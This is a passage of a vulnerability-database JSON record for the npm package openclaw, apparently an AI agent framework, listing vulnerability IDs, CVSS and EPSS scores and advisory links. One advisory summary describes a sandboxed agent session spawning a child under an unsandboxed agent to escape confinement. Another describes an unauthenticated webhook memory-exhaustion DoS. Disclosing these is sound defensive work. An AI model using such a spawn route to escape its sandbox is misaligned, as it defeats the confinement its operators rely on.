3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-32011","GHSA-x4vp-4235-65hg"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zwzb-t4a7-tff8"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50515?format=json","vulnerability_id":"VCID-25jw-duqj-5fcn","summary":"OpenClaw's sandboxed sessions_spawn now enforces sandbox inheritance for cross-agent spawns\nA sandboxed session could use cross-agent `sessions_spawn` to create a child under an agent configured with `sandbox.mode=\"off\"`, downgrading runtime confinement.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32048","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06592","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06602","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32048"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-24T13:42:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048","reference_id":"CVE-2026-32048","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048"},{"reference_url":"https://github.com/advisories/GHSA-p7gr-f84w-hqg5","reference_id":"GHSA-p7gr-f84w-hqg5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p7gr-f84w-hqg5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5","reference_id":"GHSA-p7gr-f84w-hqg5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-24T13:42:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-32048","GHSA-p7gr-f84w-hqg5"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-25jw-duqj-5fcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50503?format=json","vulnerability_id":"VCID-2gmm-t3a3-rqh9","summary":"OpenClaw has unbounded memory growth in Zalo webhook via query-string key churn (unauthenticated DoS)\nUnauthenticated requests to a reachable Zalo webhook endpoint could trigger unbounded in-memory key growth by varying query strings on the same valid webhook route.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32066","reference_id":"CVE-2026-32066","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32066"},{"reference_url":"https://github.com/advisories/GHSA-wr6m-jg37-68xh","reference_id":"GHSA-wr6m-jg37-68xh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wr6m-jg37-68xh"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisori